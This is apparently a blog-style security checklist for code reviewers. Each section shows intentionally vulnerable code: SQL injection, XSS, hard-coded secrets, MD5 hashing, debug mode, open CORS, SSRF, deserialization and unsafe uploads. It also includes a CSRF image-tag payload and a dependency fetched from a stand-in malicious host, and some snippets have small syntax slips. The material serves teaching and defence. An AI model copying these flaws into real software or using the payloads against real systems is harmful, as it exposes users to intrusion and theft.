Shipping features without a proper security review is like building a house and skipping the locks. Everything might look fine from the outside until the wrong request hits the wrong endpoint, or a forgotten token shows up in a public repo. By the time the alert fires, the damage is already done. Code reviews act as the final gate before the code goes live. They catch broken logic, misaligned structure, and bugs that tests might miss. But when the queue is long and the team’s moving fast, security details often get brushed aside. A solid security checklist fixes that by breaking down the most common security pitfalls that slip through reviews and showing how a structured checklist can bring them to the surface. From input validation to session handling, each section includes what to check, why it matters, and what it looks like in real code. Let’s dive in!

Data Validation and Encoding

Untrusted input is a common target for attackers, but careful input validation and proper output handling can prevent many security issues, including injection attacks.

What to check:

  • Is user input being validated properly?
  • Is output encoded to prevent XSS?
  • Are SQL queries protected from injection?

Example:

// ❌ Vulnerable example: no validation, no encoding, no SQL protection
app.get("/search", (req, res) => {
  const term = req.query.q;                        // 1. raw user input
  const sql = `SELECT * FROM products WHERE name LIKE '%${term}%'`; // 2. string-built SQL
  db.query(sql, (err, rows) => {                   // potential SQL injection
    if (err) throw err;
    // 3. outputs raw data straight into HTML (XSS risk)
    const list = rows.map(r => `<li>${r.name}</li>`).join("");
    res.send(`<ul>${list}</ul>`);
  });
});

Access and Session Management

Authentication is just the starting point; what matters next is controlling user access and securing sessions against hijacking.

What to check:

  • Is authentication solid (e.g., token-based, OAuth)?
  • Are there proper checks for who can access what?
  • Is session data stored and managed securely?

Example:

from flask import Flask, request, session

app = Flask(__name__)
app.secret_key = "12345"          # ❌ hard-coded, weak secret
app.config["SESSION_COOKIE_SECURE"] = False   # ❌ cookie sent over HTTP
app.config["SESSION_COOKIE_HTTPONLY"] = False # ❌ client-side scripts can read cookie

# "Login" just trusts whatever username is passed in the URL
@app.route("/login")
def login():
    session["user"] = request.args.get("user"# ❌ no password or token check
    return f"Logged in as {session['user']}"

# Admin route with zero authorization checks
@app.route("/admin")
def admin():
    return "Sensitive admin data: top-secret numbers"

if __name__ == "__main__":
    app.run(debug=True)

Secrets and Cryptography

Attackers can easily exploit hardcoded secrets and weak encryption, but strong secret management and proper encryption practices help keep sensitive data safe.

What to check:

  • Are secrets (like API keys) kept out of code?
  • Are secure storage methods used (e.g., vaults, env vars)?
  • Are strong encryption algorithms in place?

Example:

// ❌ 1. API key and DB password hard-coded in source
const STRIPE_API_KEY   = "sk_live_9gC2abCD3XYZ";
const DB_ADMIN_PASS    = "P@ssword123";

// ❌ 2. "Encrypts" data with a key that's also hard-coded
const PLAINTEXT_KEY    = "my-secret-key";                  // stored in code
function encrypt(data) {
  // Weak XOR "encryption" for demo--trivial to break
  return Buffer.from(data.split("")
    .map((c, i) => c.charCodeAt(0) ^ PLAINTEXT_KEY.charCodeAt(i % PLAINTEXT_KEY.length))
  );
}

// ❌ 3. Stores passwords with broken MD5 hash
const crypto  = require("crypto");
function storeUserPassword(rawPass) {
  const md5Hash = crypto.createHash("md5").update(rawPass).digest("hex"); // weak hash
  db.users.insert({ password: md5Hash });
}

// Sample usage
console.log("Encrypted:", encrypt("Sensitive payment token"));
storeUserPassword("hunter2");

Error Handling and Observability

While clear logs are useful during incidents, exposing detailed error messages to users can reveal sensitive information. Striking the right balance between visibility and discretion is key.

What to check:

  • Are error messages generic and leak-free?
  • Is logging structured and free of sensitive info?
  • Are logs useful for detecting issues later?

Example:

from flask import Flask, request
import traceback, logging

app = Flask(__name__)

# ❌ Unstructured logger that prints entire request data (incl. card number!)
logging.basicConfig(level=logging.INFO)

@app.route("/pay", methods=["POST"])
def pay():
    try:
        # Extract raw card data from user
        card_number = request.form["card"]
        amount      = float(request.form["amount"])

        logging.info(f"Processing payment {card_number} for ${amount}"# ❌ sensitive info in logs

        # Simulated crash
        raise ValueError("Third-party payment API failed")

    except Exception as e:
        # ❌ Sends full stack trace back to user (information leak)
        return f"<pre>{traceback.format_exc()}</pre>", 500

if __name__ == "__main__":
    app.run(debug=False)

Dependency Security

Old or vulnerable packages can quietly introduce serious risks into your codebase. Just because something works doesn’t mean it’s safe to use. Keeping dependencies in check is a key part of writing secure software.

What to check:

  • Are all dependencies regularly updated?
  • Are unused or unnecessary packages removed?
  • Do any packages come from unverified or unknown sources?

Example:

{
  "name": "demo-app",
  "version": "1.0.0",
  "scripts": {
    // ❌ No security checks or update process in place
    "start": "node index.js"
  },
  "dependencies": {
    // ❌ Outdated version with known vulnerabilities
    "express": "4.16.0",
    // ❌ Package added from an unknown or untrusted source
    "suspicious-lib": "https://malicious-site.com/lib.js"
  }
}

Configuration and Communication Security

Misconfigured settings often open the door to attacks, even when the code itself is secure. Many exploits start with something as simple as a missing header or an exposed debug mode.

What to check:

  • Are TLS, CORS, and security headers set correctly?
  • Is debug mode disabled in production?
  • Are APIs protected against abuse (e.g., rate limits)?

Example:

from flask import Flask, jsonify
from flask_cors import CORS

app = Flask(__name__)
app.config["DEBUG"] = True                 # ❌ debug mode left on in production

# ❌ CORS allowed from anywhere
CORS(app, resources={r"*": {"origins": "*"}})

@app.after_request
def no_security_headers(resp):
    # ❌ missing HSTS, CSP, X-Frame-Options, etc.
    return resp

@app.route("/api/info")
def info():
    return jsonify({"status": "public endpoint"})  # ❌ no auth, no rate limit

if __name__ == "__main__":
    # ❌ listens on port 80 (HTTP), no TLS cert
    app.run(host="0.0.0.0", port=80)

Common Security Vulnerabilities to Look For

Catch these common security vulnerabilities before they slip into production:

CSRF and SameSite Cookies

Cross-Site Request Forgery (CSRF) tricks a signed-in user’s browser into sending a state-changing request to your site; the browser willingly attaches the user’s session cookie. The SameSite cookie attribute reduces this risk by telling the browser not to send cookies on cross-site requests, adding a “seatbelt” layer.

What to check:

  • Does every state-changing request (POST/PUT/DELETE) carry a unique, server-generated CSRF token?
  • Are all session cookies set with SameSite=Lax (or Strict) and Secure and HttpOnly?
  • Do any endpoints mistakenly allow GET requests to change data?

Here’s an example of a silent money transfer triggered by a malicious image tag:

# Session cookie sent without SameSite
Set-Cookie: sessionId=abc123; Secure; HttpOnly

<!-- Attacker's site -->
<img src="https://bank.example.com/transfer?to=attacker&amount=1000">

Server-Side Request Forgery (SSRF)

SSRF happens when an app fetches a user-supplied URL, and an attacker tricks it into accessing internal systems or cloud secrets.

What to check:

  • Does the code validate destination hosts against a fixed allowlist before making outbound requests?
  • Are private IP ranges (169.254.169.254, 10.0.0.0/8, etc.) explicitly blocked?
  • Are responses from fetched URLs ever reflected back to the client without sanitizing?

Here's an example where supplying a cloud metadata URL causes the server to fetch AWS credentials:

# Flask route that screenshots a user-supplied URL
import requests
@app.route("/screenshot")
def grab():
    url = request.args.get("url")          # untrusted
    img = requests.get(url).content        # SSRF sink
    return send_file(io.BytesIO(img), mimetype="image/png")

Insecure Deserialization

In this scenario, the attacker injects gadget classes that execute code or manipulate data structures when the application deserializes untrusted data.

What to check:

  • Does the app ever call readObject(), pickle.loads(), or similar on data that came from a client?
  • Are you using a whitelist/“sealed” class approach or a safe data-only format (JSON, protobuf) instead?
  • Are deserialized objects ever passed straight into privileged methods?

Here's an example where a crafted serialized payload can trigger shell command execution during deserialization:

// Reads a serialized object straight from the request body
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Employee emp = (Employee) ois.readObject();   // attacker controls byte stream
database.save(emp);

Business-Logic Flaws

A business-logic flaw misuses the “happy-path” rules of the application (price calculations, workflow steps, quotas) rather than exploiting low-level bugs, letting attackers bend the rules to their advantage.

What to check:

  • Can users skip or repeat critical workflow steps (e.g., checkout without payment)?
  • Are discounts, balances, or quotas calculated only on the client side?
  • Do APIs apply the same input validation as the user interface, or can someone send different parameters directly to the backend?

Here's an example of an attacker that changes the price in the request and pays $1 for a $100 item:

# Client posts a price; server trusts it
@app.route("/pay", methods=["POST"])
def pay():
    amount = float(request.form["price"])      # attacker controls price
    charge_customer(current_user, amount)      # $1 instead of $100

File-Upload Risks

In this case, the server accepts uploaded files without proper checks, allowing attackers to upload dangerous files like scripts or oversized archives that can lead to remote code execution or denial-of-service.

What to check:

  • Does the backend strictly allow only safe file types, like .png or .jpg?
  • Are MIME types and file signatures (magic bytes) verified rather than trusting the Content-Type header?
  • Are uploaded files stored outside the web-root or served through a separate content server?

Here’s an example where uploading a .php file lets an attacker execute code directly on the server:

// Saves upload with its original name inside web-root
move_uploaded_file($_FILES['file']['tmp_name'],
                  'uploads/' . $_FILES['file']['name']);

Conclusion

Security is a vital pillar of effective code reviews. Integrating this checklist into your review process, automating what you can, and revisiting it regularly helps your team catch vulnerabilities early and ship code that’s secure and reliable. With security woven into every sprint, each review becomes a meaningful step toward building reliable software that stands strong in the real world.